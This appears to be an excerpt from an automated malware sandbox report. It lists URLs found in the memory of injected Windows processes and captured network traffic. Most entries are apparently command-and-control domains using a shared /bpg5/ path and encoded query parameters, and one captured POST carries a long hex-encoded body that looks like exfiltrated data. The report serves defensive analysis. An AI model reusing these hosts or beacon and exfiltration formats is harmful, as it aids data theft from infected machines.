          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fabricadepack.fun/bpg5/www.fabricadepack.funUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gomarketing.info/bpg5/www.gomarketing.infoUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.haynicorpon.biz/bpg5/www.haynicorpon.bizUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003715000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003750000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.813585736.000000000374A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/?lpw7=pOb1wbOKbC6m5caeF5Aq0gkUNx4nmy
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jhg61.com/bpg5/www.jhg61.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.musicandgros.com/bpg5/www.musicandgros.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mysparexrewards.com/bpg5/www.mysparexrewards.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com)B
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.perkibeans.com/bpg5/www.perkibeans.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.rt66omm.com/bpg5/www.rt66omm.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.techwithsun.com/bpg5/www.techwithsun.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827964090.000000000E816000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827964090.000000000E816000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/
          Source: explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/www.thetowerbells.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thetowerbells.com/bpg5/www.thetowerbells.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vns96.net/bpg5/www.vns96.netUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.wearecatalyst.app/bpg5/www.wearecatalyst.appUZCu=zJfEuRXw-P
          Source: -15B7L5MNM.4.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: -15B7L5MNM.4.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: -15B7L5MNM.4.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: -15B7L5MNM.4.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: explorer.exe, 00000003.00000002.828968378.0000000016EDC000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.819975180.0000000004B6C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.antalyabfe.com/bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3
          Source: WWAHost.exe, 00000004.00000002.813585736.0000000003728000.00000004.00000020.00020000.00000000.sdmp, -15B7L5MNM.4.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /bpg5/ HTTP/1.1Host: www.musicandgros.comConnection: closeContent-Length: 1482Cache-Control: no-cacheOrigin: http://www.musicandgros.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.musicandgros.com/bpg5/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6c 70 77 37 3d 6a 4b 63 35 47 6b 6d 71 51 57 4a 65 6b 44 6d 6a 63 53 66 41 63 67 6e 32 66 71 36 44 6c 65 33 4f 74 7a 50 52 32 51 79 54 78 32 6f 72 32 35 62 70 30 43 59 42 35 72 53 5a 46 4e 68 65 6a 31 4a 6f 70 55 7a 30 56 76 6e 31 79 45 32 7a 67 4d 52 69 56 67 59 4c 42 46 53 6c 71 37 28 71 65 77 37 6b 50 6d 5a 52 32 51 35 39 7e 37 62 6f 58 79 62 78 4c 54 35 52 4c 37 72 4c 4d 56 6b 55 39 38 4e 4d 45 59 4a 36 7a 39 50 6f 67 57 38 54 55 50 72 47 70 6b 38 30 72 30 68 35 4e 54 46 4b 53 42 44 65 77 56 70 2d 7a 6b 62 75 34 6d 52 75 48 58 6f 42 61 74 41 6c 30 70 70 4d 50 33 30 42 32 5a 33 45 72 77 57 6d 6d 32 41 39 54 30 41 2d 7e 70 6a 53 55 68 28 4a 58 4c 4a 2d 62 54 4b 57 6a 43 4e 45 4c 78 7e 6b 6a 57 69 6b 45 64 6c 41 72 39 76 67 61 69 41 6e 45 30 59 70 68 45 65 72 58 70 32 6c 58 64 77 35 45 45 4e 53 4e 68 72 31 59 4c 74 6d 73 56 79 37 70 54 6f 59 56 34 37 42 38 67 31 53 45 32 6b 42 6c 4c 37 54 44 79 6b 44 74 4b 46 36 61 44 79 6e 69 6a 66 53 39 38 35 31 43 7a 75 72 70 6b 79 6f 39 39 36 65 76 64 78 79 65 4a 37 58 35 4f 41 53 6a 5f 34 6e 4c 6c 35 45 55 62 63 76 47 32 44 4b 4e 48 7e 43 38 76 35 4f 52 36 74 58 30 42 30 79 63 4b 44 57 6b 4a 41 4c 71 77 50 57 6e 31 67 44 44 65 67 2d 76 53 67 4f 65 55 28 41 4b 67 42 56 4b 48 70 4f 64 5f 38 41 28 4f 56 6c 65 56 41 76 6e 32 33 30 54 4f 30 6c 52 51 6c 37 69 76 37 61 6e 36 35 79 6d 68 77 64 70 72 39 33 51 4e 33 34 32 75 54 39 37 50 50 5f 7e 41 53 33 57 73 4d 57 54 39 55 6c 52 75 6b 58 49 45 6a 4c 7e 57 73 49 68 73 43 51 4f 47 45 54 78 71 6c 44 4f 69 50 79 4c 37 64 32 4d 67 79 43 7a 5a 44 38 4a 39 63 76 68 36 73 65 36 42 74 6f 51 46 44 76 74 57 4b 73 74 74 33 78 39 38 49 58 49 35 59 36 45 51 79 47 72 33 61 65 42 64 41 6d 50 78 74 62 30 70 6c 4a 4d 4b 56 73 71 6c 61 42 75 6c 30 2d 73 47 54 33 79 2d 49 34 67 6c 79 6f 67 75 71 4f 34 54 6d 4f 42 48 66 4f 63 72 46 76 39 68 6d 31 71 30 39 78 4a 67 28 64 35 38 45 67 4d 62 61 37 4a 4f 71 6b 61 6c 74 72 43 42 78 59 42 4a 46 58 32 4d 65 67 4c 70 38 73 31 77 52 4e 28 4e 6c 53 71 44 39 63 6f 79 46 6b 47 33 37 33 55 52 4f 74 46 4d 4d 66 6d 4f 34 38 32 72 4a 76 68 6d 70 56 7e 66 50 71 7a 35 53 78 55 71 56 51 63 63 51 51 56 34 41 54 55 7a 62 62 4b 4a 6e 6b 4a 2d 77 59 7e 6e 68 49 32 2d 56 4b 49 61 50 30 48 4c 46 6b 36 6b 38 5a 48 4d 52 31 28 46 44 4e 38 37 6b 47 71 35 45 52 76 69 78 2d 6c 6d 50 6c 65 45 4c 7a 78 67 58 7a 7a 79 70 6a 43 68 72 46 53 68 49 38 70 30 4f 51 38 34 76 62 31 42 43 64 54 31 57 58 33 51 46 62 73 6a 51 63 4d 73 7a 73 73 4f 70 75 68 61 72 5f 4c 51 5a 44 68 76 50 54 51 75 70 4c 6f 6b 72 39 50 47 6e 58 56 63 65 75 34 48 7e 66 41 52 4f 6c 32 71 6e 76 31 5
          Source: unknownDNS traffic detected: queries for: www.berlinhealthweek.com
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.berlinhealthweek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=uI0ZFUbwVRIi3DiTUWHSZHrFFI2HorjHoi3n5y+9yD11xIHk/3oSwa67JMF5g0hIgFLJJ/T32HS+nao4IUwTEx2mn7HsaAaANg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.musicandgros.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=OwAgxHaVYkl+UI18XY1Iu2qsJ2+BnYEEJmaPOWExZbQGVS9XznV4LKZeojJXv/IuTBIyuONpXNM2+QSJdDCPUstET1IBoTg95Q==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.gomarketing.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=xEB3NkPHNzUL428JzIcGE4FODNqN6Tn6BKvtS3+/6Hi4oy4/NY/ls48/wyDTU/1Lw4jGnZUoaombkiQgI/8XP3QjR+DEcO6R3g==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.antalyabfe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.rt66omm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-P HTTP/1.1Host: www.haynicorpon.bizConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
